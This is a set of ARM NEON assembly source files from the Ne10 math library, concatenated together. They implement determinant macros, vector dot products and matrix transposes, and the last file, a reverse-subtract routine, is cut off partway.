@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_detmat.neon.inc.s
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Get determinants of two 2x2 matrices in dRes
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro GET_DET_2x2MATS_ARGS dA, dB, dC, dD, dRes
vmul.f32 \dRes, \dA, \dD
vmls.f32 \dRes, \dB, \dC
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Get negated determinants of two 2x2 matrices in dRes
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro GET_NEG_DET_2x2MATS_ARGS dA, dB, dC, dD, dRes
GET_DET_2x2MATS_ARGS \dC, \dD, \dA, \dB, \dRes
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ A macro used inside ne10_detmat_3x3f_neon() to load 3x3 matrices.
@ Two 3x3 matrices are loaded from the source address
@ into registers dst00-11. The corresponding qr00-qr05
@ registers are then rearranged so the order of the data fits the
@ code written in other macros below.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro LOAD_3x3MATS_ARGS dst00, dst01, dst02, dst03, dst04, dst05, dst06, dst07, dst08, dst09, dst10, dst11, qr00, qr01, qr02, qr03, qr04, qr05, addr
vld3.32 { \dst00, \dst02, \dst04 }, [\addr]!
vld3.32 { \dst01[0], \dst03[0], \dst05[0] }, [\addr]!
vld3.32 { \dst06, \dst08, \dst10 }, [\addr]!
vld3.32 { \dst07[0], \dst09[0], \dst11[0] }, [\addr]!
vtrn.32 \qr00, \qr03
vtrn.32 \qr01, \qr04
vtrn.32 \qr02, \qr05
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro calculates the determinant of two 3x3 matrices
@ loaded using the above LOAD_3x3MATS_ARGS macro.
@ The result is stored in the \res register.
@ Registers \tmp2 and \tmp3 are used as scratch registers and will
@ not be restored in this macro - the caller needs to resotre them
@ if needed. Each of the aa-ii parameters can be a "d" register
@ containing two floating-point values which correspond to the
@ following reference matrix:
@
@ |aa dd gg|
@ M = |bb ee hh|
@ |cc ff ii|
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro GET_DETERMINANT_of_3x3MATS_ARGS aa, bb, cc, dd, ee, ff, gg, hh, ii, res, tmp2, tmp3
@ det = a*(ei-fh) - d*(bi-ch) + g*(bf-ec)
vmul.f32 \res, \ee, \ii @ t1 = ei
vmul.f32 \tmp2, \bb, \ii @ t2 = bi
vmul.f32 \tmp3, \bb, \ff @ t3 = bf
vmls.f32 \res, \ff, \hh @ t1 = ei-fh
vmls.f32 \tmp2, \cc, \hh @ t2 = bi-ch
vmls.f32 \tmp3, \ee, \cc @ t3 = bf-ec
vmul.f32 \res, \aa, \res @ t1 = a*(ei-fh)
vmls.f32 \res, \dd, \tmp2 @ t1 = a*(ei-fh) - d*(bi-ch)
vmla.f32 \res, \gg, \tmp3 @ t1 = a*(ei-fh) - d*(bi-ch) + g*(bf-ec) = det(M1), det(M2)
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro calculates nagated determinant of two 3x3 matrices
@ The result is stored in \res
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro GET_NEG_DET_3x3MATS_ARGS aa, bb, cc, dd, ee, ff, gg, hh, ii, res, tmp2, tmp3
@ det = - a*(ei-fh) + d*(bi-ch) - g*(bf-ec)
GET_DETERMINANT_of_3x3MATS_ARGS \dd, \ee, \ff, \aa, \bb, \cc, \gg, \hh, \ii, \res, \tmp2, \tmp3 @ Using the column exchange property
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ A macro used inside ne10_detmat_4x4f_neon() to load 4x4 matrices.
@ Two 4x4 matrices are loaded from the source address register \addr
@ into registers dst00-15. The corresponding qr00-qr07
@ registers are then rearranged so the order of the data fits the
@ code written in other macros below.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro LOAD_4x4MATS_ARGS dst00, dst01, dst02, dst03, dst04, dst05, dst06, dst07, dst08, dst09, dst10, dst11, dst12, dst13, dst14, dst15, qr00, qr01, qr02, qr03, qr04, qr05, qr06, qr07, addr
vld4.32 { \dst00, \dst02, \dst04, \dst06 }, [\addr]!
vld4.32 { \dst01, \dst03, \dst05, \dst07 }, [\addr]!
vld4.32 { \dst08, \dst10, \dst12, \dst14 }, [\addr]!
vld4.32 { \dst09, \dst11, \dst13, \dst15 }, [\addr]!
vtrn.32 \qr00, \qr04
vtrn.32 \qr01, \qr05
vtrn.32 \qr02, \qr06
vtrn.32 \qr03, \qr07
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro calculates the determinant of 4x4 matrices
@ loaded using the above LOAD_4x4MATS_ARGS macro.
@ The result is stored in the \res register.
@ Registers \tmp2 to \tmp6 are used as scratch registers and will
@ not be restored in this macro - the caller needs to resotre them
@ if needed. Each of the aa-pp parameters can be a "d" register
@ containing two floating-point values which correspond to the
@ following reference matrix:
@
@ |aa ee ii mm|
@ M = |bb ff jj nn|
@ |cc gg kk oo|
@ |dd hh ll pp|
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro GET_DETERMINANT_of_4x4MATS_ARGS aa, bb, cc, dd, ee, ff, gg, hh, ii, jj, kk, ll, mm, nn, oo, pp, res, tmp2, tmp3, tmp4, tmp5, tmp6
@ res = det(SubM11)
GET_DETERMINANT_of_3x3MATS_ARGS \ff, \gg, \hh, \jj, \kk, \ll, \nn, \oo, \pp, \res, \tmp5, \tmp6
@ tmp2 = det(SubM12)
GET_DETERMINANT_of_3x3MATS_ARGS \bb, \cc, \dd, \jj, \kk, \ll, \nn, \oo, \pp, \tmp2, \tmp5, \tmp6
@ tmp3 = det(SubM13)
GET_DETERMINANT_of_3x3MATS_ARGS \bb, \cc, \dd, \ff, \gg, \hh, \nn, \oo, \pp, \tmp3, \tmp5, \tmp6
@ tmp4 = det(SubM14)
GET_DETERMINANT_of_3x3MATS_ARGS \bb, \cc, \dd, \ff, \gg, \hh, \jj, \kk, \ll, \tmp4, \tmp5, \tmp6
vmul.f32 \res, \aa, \res
vmls.f32 \res, \ee, \tmp2
vmla.f32 \res, \ii, \tmp3
vmls.f32 \res, \mm, \tmp4
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ A macro used inside ne10_detmat_4x4f_neon() to load four 4x4 matrices
@ from the memory location pointed to by the \addr register.
@ The loaded matrices are stored in registers dst00-07 and
@ finaklly rearranged using the corresponding registers qr00-qr03.
@ qtmp1-qtmp4 are scratch registers which are not resotred in this
@ maroc. The caller must restored them if needed.
@ NOTE: Through out Ne10, matrices are loaded and stored in
@ column major format.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro LOAD_SINGLE_4x4MAT_ARGS dst00, dst01, dst02, dst03, dst04, dst05, dst06, dst07, qr00, qr01, qr02, qr03, qtmp1, qtmp2, qtmp3, qtmp4, addr
vld4.32 { \dst00, \dst02, \dst04, \dst06 }, [\addr]!
vld4.32 { \dst01, \dst03, \dst05, \dst07 }, [\addr]!
vtrn.32 \qr00, \qtmp1
vtrn.32 \qr01, \qtmp2
vtrn.32 \qr02, \qtmp3
vtrn.32 \qr03, \qtmp4
.endm
|
open-vela/external_Ne10 | 10,431 | modules/math/NE10_dot.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_dot.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.align 4
.global ne10_dot_vec2f_neon
.thumb
.thumb_func
ne10_dot_vec2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t dot_float(arm_float_t * dst,
@ arm_vec2f_t * src1,
@ arm_vec2f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are residual that will be processed at the begin of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec2
.L_residualloop_vec2:
@ process the residual items in the input array
vld1.f32 d0, [r1]!
vld1.f32 d1, [r2]!
subs r4, r4, #1
@ calculate values
vmul.f32 d0, d0, d1
vpadd.f32 d0, d0
vst1.32 {d0[0]}, [r0]!
bgt .L_residualloop_vec2
.L_check_mainloop_vec2:
cbz r3, .L_return_vec2
@ load the current set of values
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
.L_mainloop_vec2:
@ calculate values for current set
vmul.f32 q8, q0, q2
vmla.f32 q8, q1, q3
@ store the result for current set
vst1.32 {d16,d17}, [r0]!
subs r3, r3, #1
@ load the next set of values
vld2.32 {q0-q1}, [r1]!
vld2.32 {q2-q3}, [r2]!
bgt .L_mainloop_vec2 @ loop if r3 > 0, if we have at least another 4 vectors (8 floats) to process
.L_return_vec2:
@ return
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_dot_vec3f_neon
.thumb
.thumb_func
ne10_dot_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t dot_float(arm_float_t * dst,
@ arm_vec3f_t * src1,
@ arm_vec3f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are residual that will be processed at the begin of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec3
.L_residualloop_vec3:
@ process the residual items in the input array
vld3.f32 {d0[0], d2[0], d4[0]}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, -, -, - };
@ q1 = { V1.y, -, -, - };
@ q2 = { V1.z, -, -, - };
vld3.f32 {d1[0], d3[0], d5[0]}, [r2]! @ The values are loaded like so:
@ q0 = { V1.x, -, V2.x, - };
@ q1 = { V1.y, -, V2.y, - };
@ q2 = { V1.z, -, V2.z, - };
subs r4, r4, #1
@ calculate values for
vmul.f32 d0, d0, d1
vmla.f32 d0, d2, d3
vmla.f32 d0, d4, d5
vst1.32 {d0[0]}, [r0]!
bgt .L_residualloop_vec3
.L_check_mainloop_vec3:
cbz r3, .L_return_vec3
@ load current set of values
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d16, d18, d20}, [r2]!
vld3.32 {d17, d19, d21}, [r2]!
.L_mainloop_vec3:
@ calculate values for current set
vmul.f32 q15, q0, q8
vmla.f32 q15, q1, q9
vmla.f32 q15, q2, q10
@ store the result for current set
vst1.32 {d30, d31}, [r0]!
subs r3, r3, #1
@ load the next set of values
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
vld3.32 {d16, d18, d20}, [r2]!
vld3.32 {d17, d19, d21}, [r2]!
bgt .L_mainloop_vec3 @ loop if r3 > 0, if we have at least another 4 vectors (12 floats) to process
.L_return_vec3:
@ return
pop {r4}
mov r0, #0
bx lr
.align 4
.global ne10_dot_vec4f_neon
.thumb
.thumb_func
ne10_dot_vec4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t dot_float(arm_float_t * dst,
@ arm_vec4f_t * src1,
@ arm_vec4f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: *src2 & current src2 entry's address
@ r3: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r4: the number of items that are residual that will be processed at the begin of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4; calculate the residual loop
asr r3, r3, #2 @ r3 = count >> 2; calculate the main loop
cbz r4, .L_check_mainloop_vec4
.L_residualloop_vec4:
@ process the residual items in the input array
vld1.f32 {d0, d1}, [r1]! @ The values are loaded like so:
@ q0 = { V1.x, V1.y, V1.z, V1.w };
vld1.f32 {d2, d3}, [r2]! @ The values are loaded like so:
@ q1 = { V2.x, V2.y, V2.z, V2.w };
subs r4, r4, #1
@ calculate values
vmul.f32 q0, q0, q1
vadd.f32 d0, d0, d1
vpadd.f32 d0, d0
vst1.32 {d0[0]}, [r0]!
bgt .L_residualloop_vec4
.L_check_mainloop_vec4:
cbz r3, .L_return_vec4
@ load current set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d16, d18, d20, d22}, [r2]!
vld4.32 {d17, d19, d21, d23}, [r2]!
.L_mainloop_vec4:
@ calculate values for current set
vmul.f32 q15, q0, q8
vmla.f32 q15, q1, q9
vmla.f32 q15, q2, q10
vmla.f32 q15, q3, q11
@ store the result for current set
vst1.32 {d30, d31}, [r0]!
subs r3, r3, #1
@ load the next set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
vld4.32 {d16, d18, d20, d22}, [r2]!
vld4.32 {d17, d19, d21, d23}, [r2]!
bgt .L_mainloop_vec4 @ loop if r3 > 0, if we have at least another 4 vectors (12 floats) to process
.L_return_vec4:
@ return
pop {r4}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 10,872 | modules/math/NE10_transmat.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_transmat.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.include "NE10_detmat.neon.inc.s"
.balign 4
.global ne10_transmat_2x2f_neon
.thumb
.thumb_func
ne10_transmat_2x2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_transmat_2x2f(arm_mat2x2f_t * dst,
@ arm_mat2x2f_t * src,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r3: the number of items that are left to be processed at the end
@ of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r2; This is what's left to be processed after this loop
cmp r2, #0
beq .L_check_mat2x2
.L_mainloop_mat2x2:
subs r2, r2, #4
vld4.32 {d16, d18, d20, d22}, [r1]!
vld4.32 {d17, d19, d21, d23}, [r1]!
vswp q9, q10
vst4.32 {d16, d18, d20, d22}, [r0]!
vst4.32 {d17, d19, d21, d23}, [r0]!
bgt .L_mainloop_mat2x2 @ loop if r2 > 0, if we have at least another 4 vectors (8 floats) to process
.L_mainloopend_mat2x2:
.L_check_mat2x2:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_mat2x2
.L_secondloop_mat2x2:
@ process the last few items left in the input array
vld4.32 {d16[0], d18[0], d20[0], d22[0]}, [r1]!
vswp d18, d20
subs r3, r3, #1
vst4.32 {d16[0], d18[0], d20[0], d22[0]}, [r0]!
bgt .L_secondloop_mat2x2
.L_return_mat2x2:
@ return
mov r0, #0
bx lr
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro calculates the inverse of two 3x3 marices
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro STORE_3x3TRNMATS
@ rearrange the results for use in a "vst3" instruction...
vtrn.32 q8 , q11
vtrn.32 q9 , q12
vtrn.32 q10, q13
vst3.32 { d16 , d18 , d20 }, [r0]!
vst3.32 { d17[0], d19[0], d21[0]}, [r0]!
vst3.32 { d22 , d24 , d26 }, [r0]!
vst3.32 { d23[0], d25[0], d27[0]}, [r0]!
.endm
.align 2
.global ne10_transmat_3x3f_neon
.thumb
.thumb_func
ne10_transmat_3x3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_transmat_3x3f(arm_mat3x3f_t * dst,
@ arm_mat3x3f_t * src1,
@ arm_mat3x3f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r3: the number of items that are left to be processed at the end
@ of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r2 = count % 4;
sub r2, r2, r3 @ count = count - r2; This is what's left to be processed after this loop
cmp r2, #0
beq .L_check_mat3x3
.L_mainloop_mat3x3:
LOAD_3x3MATS_ARGS d16, d17, d18, d19, d20, d21, d22, d23, d24, d25, d26, d27, q8, q9, q10, q11, q12, q13, r1
subs r2, r2, #2
vswp d20, d17
vswp d22, d18
vswp d26, d19
STORE_3x3TRNMATS
bgt .L_mainloop_mat3x3 @ loop if r2 > 0, if we have at least another 4 vectors (12 floats) to process
.L_mainloopend_mat3x3:
.L_check_mat3x3:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_mat3x3
.L_secondloop_mat3x3:
@ process the last few items left in the input array
@ load the next (e.g. 3rd) set of values
vld3.32 { d16 , d18 , d20 }, [r1]!
vld3.32 { d17[0], d19[0], d21[0]}, [r1]!
vtrn.32 q8 , q11
vtrn.32 q9 , q12
vtrn.32 q10, q13
subs r3, r3, #1
vswp d20, d17
vswp d22, d18
vswp d26, d19
@ store the result for the last (e.g. 3rd) set
vtrn.32 q8 , q11
vtrn.32 q9 , q12
vtrn.32 q10, q13
vst3.32 { d16 , d18 , d20 }, [r0]!
vst3.32 { d17[0], d19[0], d21[0]}, [r0]!
bgt .L_secondloop_mat3x3
.L_return_mat3x3:
@ return
mov r0, #0
bx lr
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ This macro calculates the inverse of two 4x4 marices
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro STORE_4x4INVMATS
@ rearrange the results for use in a "vst3" instruction...
vtrn.32 q8, q12
vtrn.32 q9, q13
vtrn.32 q10, q14
vtrn.32 q11, q15
vst4.32 { d16 , d18 , d20 , d22 }, [r0]!
vst4.32 { d17 , d19 , d21 , d23 }, [r0]!
vst4.32 { d24 , d26 , d28 , d30 }, [r0]!
vst4.32 { d25 , d27 , d29 , d31 }, [r0]!
.endm
.align 2
.global ne10_transmat_4x4f_neon
.thumb
.thumb_func
ne10_transmat_4x4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_transmat_4x4f(arm_mat4x4f_t * dst,
@ arm_mat4x4f_t * src1,
@ arm_mat4x4f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r3: the number of items that are left to be processed at the end
@ of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cmp r2, #0
beq .L_check_mat4x4
.L_mainloop_mat4x4:
LOAD_4x4MATS_ARGS d16, d17, d18, d19, d20, d21, d22, d23, d24, d25, d26, d27, d28, d29, d30, d31, q8, q9, q10, q11, q12, q13, q14, q15, r1
subs r2, r2, #2
vswp d18, d24
vswp d17, d20
vswp d22, d25
vswp d19, d28
vswp d27, d30
vswp d23, d29
STORE_4x4INVMATS
bgt .L_mainloop_mat4x4 @ loop if r2 > 0, if we have at least another 4 vectors (16 floats) to process
.L_mainloopend_mat4x4:
.L_check_mat4x4:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_mat4x4
.L_secondloop_mat4x4:
@ process the last few items left in the input array
vld4.32 { d16 , d18 , d20 , d22 }, [r1]!
vld4.32 { d17 , d19 , d21 , d23 }, [r1]!
vtrn.32 q8, q12
vtrn.32 q9, q13
vtrn.32 q10, q14
vtrn.32 q11, q15
subs r3, r3, #1
vswp d18, d24
vswp d17, d20
vswp d22, d25
vswp d19, d28
vswp d27, d30
vswp d23, d29
@ store the results
vtrn.32 q8, q12
vtrn.32 q9, q13
vtrn.32 q10, q14
vtrn.32 q11, q15
vst4.32 { d16 , d18 , d20 , d22 }, [r0]!
vst4.32 { d17 , d19 , d21 , d23 }, [r0]!
bgt .L_secondloop_mat4x4
.L_return_mat4x4:
@ return
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 9,792 | modules/math/NE10_rsbc.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_rsbc.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_rsbc_float_asm
.thumb
.thumb_func
ne10_rsbc_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_rsbc_float(arm_vec2f_t * dst,
@ arm_float_t * src, const arm_float_t * cst,
@ unsigned int count)
@
@ r0: *dst
@ r1: *src
@ r2: cst
@ r3: int count
@
@ r3: loop counter
@ r5: current item's offset in both src[] and dst[]
@ r6: current source item's address made of base(r1)+offset(r5)
@ r7: current destination item's address made of base(r0)+offset(r5)
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5, r6, r7}
cbz r3, .LoopEndFloat
mov r5, #0
.LoopBeginFloat:
